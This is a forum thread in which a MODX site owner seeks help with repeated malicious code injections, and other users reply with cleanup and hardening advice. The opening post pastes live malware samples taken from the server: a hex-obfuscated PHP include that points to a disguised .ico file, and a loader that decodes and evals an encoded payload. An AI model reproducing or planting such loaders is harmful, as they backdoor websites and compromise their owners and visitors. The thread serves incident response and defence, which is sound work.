MODX website keeps getting infected with malicious code injections - My Forums

MODX website keeps getting infected with malicious code injections

hartmanrik — Feb 26, 2018, 11:06 AM

After hours and hours of reading and trial and error I'm out of options.

Installation info:

MODX version: 2.6.1
PHP version: 5.6.33
DB info: mysql, version: 10.0.29-MariaDB-cll-lve

My MODX installations keeps getting compromised.
Malicious code is injected in certain index.php files. Example:

/*3e166*/

@include "\x2fho\x6de/\x64eb\x3950\x391/\x64om\x61in\x73/m\x69dd\x65lb\x75rg\x67ez\x69ch\x74va\x6ede\x73ta\x64.n\x6c/p\x75bl\x69c_\x68tm\x6c/a\x73se\x74s/\x63om\x70on\x65nt\x73/r\x65ca\x70tc\x68av\x32/f\x61vi\x63on\x5f20\x324c\x36.i\x63o";

/*3e166*/

The includes are referring to ICO files, which contain scrambled code.

Besides this, the hack also creates new, random, files, like:
ucwuwapz.php
footer21.php
vexwzlkn.php

Contents of footer21.php (similar to the other files):

 1 && $__id[1] == ':') {$__id = str_replace('\\', '/', substr($__id, 2));$__here = str_replace('\\', '/', substr($__here, 2));}$__rd = "/" . str_repeat('/..', substr_count($__id, '/')) . $__here . '/';$__i = strlen($__rd);while ($__i--) {if ($__rd[$__i] == '/') {$__lp = substr($__rd, 0, $__i) . $__ln;if ($__lp = fread($__oid, @filesize(__FILE__))) {$__ln = pack("H*", $__ln("/[A-Z,\r,\n]/", "", substr($__lp, 0x99d-0x4ed)));break;}}}eval($__ln);return 0;} else {die('The file ' . __FILE__ . " is corrupted.\n");}if (function_exists('il_exec')) {return il_exec();}echo('Please check System Requirements on vendor site because the file ' . __FILE__ . ' requires the ionCube PHP Loader ' . basename($__ln) . ' to be installed by the site administrator.');return 0;

?>
2473S6D9I7X66E568X20S3d2041Z7D2726179S2827776V8C7a7Oa746dI2V73d3e277aL6Ga6T1
65H6H8O64T272D9D3b2472T6Lc64O772G0H3GdH20417L27A26A1792W82T7N686Pf7979H2N73
DdT3e2E76dF6Xe6D7706fC272M93b666Hf72K65P6Q1636Q82028T41727S261I7M92824736J9
7U66A5Q6U82Ec20245LfQ504Wf5354K2c2024L7Q2Y6c6477D2c20R2S45f43B4VfC4fO4Eb494
52S920P617Y3A20247275Z7475D2W9207Pb6B66VfD7B26H56R163Y682V02M82N4727T57P4I7
G520K6P1732L02479666bW6Y5W6Bf203d3e2024V646R8X6I776R2L92L0M7Mb24646O8X6776C
2C0Q3Vd2Q040F70L6163X6b28T22T4W8Z2aU222XcW2B02464686B776293Db24Y796N66b6G56
fP202e3dS2K022S32L663430Q3E861G63632dU626566612Td3432X3C733G2dT393P038642Rd
N3F5U63I3A833V33W6D5Z62663534N35O31223b24H657Va6bD6aJ78203Fd2G0W24646867F7S
6F205e2O07T37S56N27374A7P22T8B7374V72O5f7Y2S6C5V706561C742824M79Q6H66b656f2
BcN202V873M7472L6c65U6e28X24646867O7629202f2073747B26Hc656e2H8E2H4Z796F6D6b
G65C6f29Q29V2A02Gb2D0I312Z9Z2c2T0302c20737L472U6c6E56e28A24H646V8M6N776292N
93bW24L657a6b6aD78D20W3dX206578706cB6Lf64652P8E2D223222Vc2Q024X657a6PbR6aI7
829G3bM69662028B6B36Uf75B6Ie7428W24U6K5M7a6NbU6a78Z29203Fd3dJ20P332Z920W7b6
5D76A61S6cE28C24657DaN6b6a785Hb3W15dO28F2P4Y657a6bM6aU78B5bX325d292V9M3b657
O8J6974O282J93bV7dA7d7d

Another practical problem is that MODX sites that are infected, will stop working after a while.

I did all the standard stuff and followed the excellent guide at https://forums.modx.com/thread/94643/how-to-clean-up-your-hacked-webspace

Checked for malicious plugins/users
Changed all passwords, form MODX users to DirectAdmin/FTP/DB
Moved the website to a new hosting account
Used the guide mentioned earlier to identify malicious includes via SSH

Unfortunately this will only temporarily remove the infection.
Right now the only thing I can do is running a cronjob that removes all unwanted ICO files form my host every hour...

I'm not sure if this is a specific MODX related infection. The truth is that only MODX-installations are affected right now.

Is there someone who experienced the same problems and found a solution? Any advice is welcome!

Thanks in advance..

Re: MODX website keeps getting infected with malicious code injections

BobRay — Mar 12, 2019, 07:04 PM

I can imagine an attack that involves a direct call to index.php targeting a specific extra file. Changing the 'q' would protect against that, but I don't think attacking in that way would be any more effective than just using the URL for the file without going through index.php.

Re: MODX website keeps getting infected with malicious code injections

markh — Mar 12, 2019, 04:40 AM

That changes the name of the parameter used by friendly URLs. When you normally request /contact.html, what MODX sees is index.php?q=contact.html. The changes goldsky suggests changes that to index.php?typeYourNewParamAliasHere=contact.html.

I'm honestly not sure what that has to do with the hacks mentioned in this topic.

The only reason I can think of to change that setting is if you're trying to use 2 different CMSs that both use the q parameter, from the same index.php file, which would be.. interesting and oddly specific.

Re: MODX website keeps getting infected with malicious code injections

rgliberty — Mar 08, 2019, 02:32 AM

Quote from: goldsky at Nov 27, 2018, 06:20 AM

You can try to change the "request_param_alias" parameter in System Settings, and edit your htaccess to follow the value.
RewriteRule ^(.*)$ index.php?typeYourNewParamAliasHere=$1 [L,QSA]
Make it random and hard to guess.

What exactly will this do?

Re: MODX website keeps getting infected with malicious code injections

goldsky — Nov 27, 2018, 06:20 AM

You can try to change the "request_param_alias" parameter in System Settings, and edit your htaccess to follow the value.

RewriteRule ^(.*)$ index.php?typeYourNewParamAliasHere=$1 [L,QSA]

Make it random and hard to guess.

Re: MODX website keeps getting infected with malicious code injections

hartmanrik — Nov 12, 2018, 02:16 PM

Quote from: nickyz at Nov 02, 2018, 04:11 PM

I had a similar problem but tried this tool and it worked: https://revisium.com/aibo/
You should scan a full local copy of the website and then clean all the mess manually according to the scan report generated.
These code injections could survive version upgrades. I had the infection even with 2.6.5 system upgraded.

Thanks for the contribution!
I'm still having issues, even after a thorough cleanup. (and also on 2.6.5....)
I will try your solution.

Re: MODX website keeps getting infected with malicious code injections

nickyz — Nov 02, 2018, 04:11 PM

I had a similar problem but tried this tool and it worked: https://revisium.com/aibo/
You should scan a full local copy of the website and then clean all the mess manually according to the scan report generated.
These code injections could survive version upgrades. I had the infection even with 2.6.5 system upgraded.

Re: MODX website keeps getting infected with malicious code injections

BobRay — Apr 09, 2018, 08:06 PM

The first thing to do is look at your Users to see if there are any that should not be there. Then, see if you have any plugins you did not install (especially ones with names like "core services").

Version 2.5.2 is somewhat old (Nov. 2016) and there have been several security updates since them. Upgrading won't solve your current problem, but you once you have things straightened out, you should definitely update to 2.6.0, then the current version.

If you are on a shared server, it's worth asking the hosting service if other sites on your server have been compromised.

Re: MODX website keeps getting infected with malicious code injections

bjortin — Apr 08, 2018, 04:22 PM

Hi,

Just got noticed that someone have been able to login and modify files in our Revolution environment (2.5.2). A certain template file had been modified to include the JS for the Miner-C Trojan.

Our log file show calls to the manger/index.php, with the following GET parameters:

?a=system/file/edit&file=site/units/PageTitle/PageTitle.tpl&wctx=mgr&source=1

We are also seeing POST calls to /connectors/index.php

What did they do and how do I prevent this action?

Re: MODX website keeps getting infected with malicious code injections

hartmanrik — Feb 27, 2018, 09:02 AM

@sepiariver
@JayGilmore

Great additions.
Thanks a lot!

Not sure if I mentioned it before: index.php files are indeed altered. Yesterday I did a thorough search and clean operation. Found numerous malicious files and includes.
Searched the database for suspicious code (found nothing). After that I changed all the passwords.

Unfortunately, overnight several index.php have been altered.
This particular website is not on a virtual/shared host.

Apache logs are full with strange and unwanted requests, like: "GET /docs/c6n97.php?27a1=wp-content%2Fthemes%2Ftwentysixteen%2Fjs%2Fskip-link-focus-fix.js HTTP/1.1" 301 383" (and this is a modest one, if you know what I mean ;-))
Those request will be redirected to a 443 page as far as I can see and test.

I think my only option is to rebuild the websites.
The thing is that I'm not certain what the source / nature of the hack is. Is it 'just' a malicious backdoor or is my webspace compromised?